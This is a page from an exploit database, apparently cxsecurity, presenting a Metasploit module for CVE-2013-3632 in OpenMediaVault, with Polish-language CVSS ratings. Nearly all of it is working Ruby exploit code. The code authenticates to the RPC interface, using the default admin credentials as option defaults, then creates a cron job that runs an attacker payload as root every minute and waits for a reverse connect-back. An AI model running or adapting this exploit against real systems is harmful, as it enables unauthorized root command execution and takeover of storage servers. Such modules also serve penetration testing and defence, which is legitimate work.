OpenMediaVault Cron Remote Command Execution

2013.10.31
Credit: Brandon Perry
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-3632
CWE: CWE-78


Ogólna skala CVSS: 9/10
Znaczenie: 10/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'OpenMediaVault Cron Remote Command Execution', 'Description' => %q{ OpenMediaVault allows an authenticated user to create cron jobs as aribtrary users on the system. An attacker can abuse this to run arbitrary commands as any user available on the system (including root). }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module ], 'References' => [ ['CVE', '2013-3632'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats'] ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 60 }, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby bash telnet python', } }, 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic',{}]], 'DisclosureDate' => 'Oct 30 2013', 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ false, "Password to authenticate with", 'openmediavault']) ], self.class) end def exploit init = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/index.php') }) sess = init.get_cookies post = "{\"service\":\"Authentication\",\"method\":\"login\",\"params\":{\"username\":\"#{datastore["USERNAME"]}\",\"password\":\"#{datastore["PASSWORD"]}\"}}" login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/rpc.php'), 'data' => post, 'ctype' => 'application/json', 'cookie' => sess }) if !login or login.code != 200 fail_with("Login failed") end sess = login.get_cookies post = '{"service":"Cron","method":"set","params":{"enable":true,"minute":"*","hour":"*","dayofmonth":"*","month":"*","dayofweek":"*","username":"root","command":"' post << payload.encoded.gsub('"', '\"') post << '","comment":"","type":"userdefined","everynminute":false,"everynhour":false,"everyndayofmonth":false,"sendemail":false,"uuid":"undefined"}}' resp = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/rpc.php'), 'data' => post, 'ctype' => 'application/json', 'cookie' => sess }) if !resp or resp.code != 200 fail_with("Posting cron failed.") end print_status("Waiting for connect-back, this will take up to a minute") end end

Referencje:

https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top